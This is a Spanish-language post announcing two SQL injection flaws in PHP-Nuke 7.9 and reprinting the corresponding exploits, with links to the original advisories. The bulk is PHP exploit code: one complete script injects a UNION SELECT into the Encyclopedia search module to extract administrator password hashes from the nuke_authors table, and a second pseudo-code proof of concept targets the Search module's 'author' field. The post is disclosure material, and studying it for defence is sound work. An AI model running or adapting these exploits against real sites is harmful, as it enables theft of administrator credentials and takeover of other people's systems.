|
Se encontraron dos vulnerabilidades en la ultima version de PHP-Nuke (7.9). Las mismas fueron encontradas por un colega Argentino(Paisterist.nst) y ya estan disponible para el publico los correspondientes exploits.
PHP Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection vulnerabilities
PHP-Nuke <= 7.9 Search module "author" SQL Injection vulnerability
PHP Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection vulnerabilities exploit
<?
/*
Neo Security Team - Exploit made by Paisterist on 2006-10-22
http://www.neosecurityteam.net
*/
$host="localhost";
$path="/phpnuke/";
$port="80";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$data="query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM nuke_authors WHERE '1'='1";
if ($fp) {
$p="POST ".$path."modules.php?name=Encyclopedia&file=search HTTP/1.0rn";
$p.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*rn";
$p.="Referer: http://$host".$path."modules.php?name=Encyclopedia&file=searchrn";
$p.="Accept-Language: es-arrn";
$p.="Content-Type: application/x-www-form-urlencodedrn";
$p.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)rn";
$p.="Host: $hostrn";
$p.="Content-Length: ".strlen($data)."rn";
$p.="Pragma: no-cachern";
$p.="Connection: keep-alivernrn";
$p.=$data;
fwrite($fp, $p);
while (!feof($fp)) {
$content .= fread($fp, 4096);
}
preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);
print "<b>Hash: </b>".$matches[0];
}
?>
PHP-Nuke <= 7.9 Search module "author" SQL Injection vulnerability Exploit
<?
/*
Neo Security Team - Pseudo-Code Proof of Concept Exploit
http://www.neosecurityteam.net
Paisterist
*/
set_time_limit(0);
$host="localhost";
$ path="/phpnuke/";
$port="80";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$data=""; /* Here the variables, like "query", "topic" and "author" with the SQL Injection */
if ($fp) {
/* we put the POST request on $p variable, sending the data saved on $data. */
fwrite($fp, $p);
while (!feof($fp)) {
$content .= fread($fp, 4096);
}
preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);
if ($matches[0])
print "<b>Hash: </b>".$matches[0];
}
?>
Para mas informacion visite
http://www.neosecurityteam.net/index.php?action=advisories&id=27
http://www.neosecurityteam.net/index.php?action=advisories&id=28
 agregar a favoritos (13) |  Cite este artículo en su sitio | Views: 1256
Solo los usuarios registrados pueden agregar sus comentarios.
Por favor, vaya a login, o regístrese. Powered by AkoComment Tweaked Special Edition v.1.4.6
AkoComment © Copyright 2004 by Arthur Konze - www.mamboportal.com
All right reserved
|
